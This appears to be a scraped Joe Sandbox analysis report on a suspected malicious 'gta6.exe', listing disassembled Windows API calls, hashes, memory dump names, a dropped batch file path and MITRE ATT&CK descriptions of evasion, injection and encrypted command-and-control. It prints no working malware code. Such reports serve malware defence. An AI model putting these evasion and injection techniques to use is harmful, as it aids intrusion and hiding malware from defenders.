WideCharToMultiByte.KERNEL32 ref: 000000014001757B
malloc.MSVCRT ref: 0000000140017592

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700

Function 00000001400112A8 Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 00000001400112C4
RtlReAllocateHeap.NTDLL ref: 0000000140011308
RtlLeaveCriticalSection.NTDLL ref: 0000000140011355

Part of subcall function 0000000140011CB0: RtlAllocateHeap.NTDLL ref: 0000000140011CC8

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: AllocateCriticalHeapSection$EnterLeave
String ID:
API String ID: 3625150316-0
Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350

Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32 ref: 000000014000DCCD
SHGetPathFromIDListW.SHELL32 ref: 000000014000DCDF
wcslen.MSVCRT ref: 000000014000DCEC
CoTaskMemFree.COMBASE ref: 000000014000DD0F

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300

Function 0000000140011668 Relevance: 6.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 000000014001167F
HeapFree.KERNEL32 ref: 000000014001169A
HeapFree.KERNEL32 ref: 00000001400116BC
RtlLeaveCriticalSection.NTDLL ref: 00000001400116E2

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300

Function 0000000140017410 Relevance: 5.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 0000000140017451
malloc.MSVCRT ref: 000000014001746B
MultiByteToWideChar.KERNEL32 ref: 0000000140017486
malloc.MSVCRT ref: 00000001400174A3

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704

Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D140: memset.MSVCRT ref: 000000014000D1C3

Part of subcall function 0000000140011968: RtlEnterCriticalSection.NTDLL ref: 0000000140011985
Part of subcall function 0000000140011968: HeapFree.KERNEL32 ref: 00000001400119E7
Part of subcall function 0000000140011968: RtlLeaveCriticalSection.NTDLL ref: 00000001400119F4

HeapFree.KERNEL32 ref: 000000014000CE61
HeapFree.KERNEL32 ref: 000000014000CE74
HeapFree.KERNEL32 ref: 000000014000CE8F
HeapFree.KERNEL32 ref: 000000014000CEB1

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gta6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: gta6.exePID: 6684, Parent PID: 4056

General

Chronological Activities

Windows Analysis Report
gta6.exe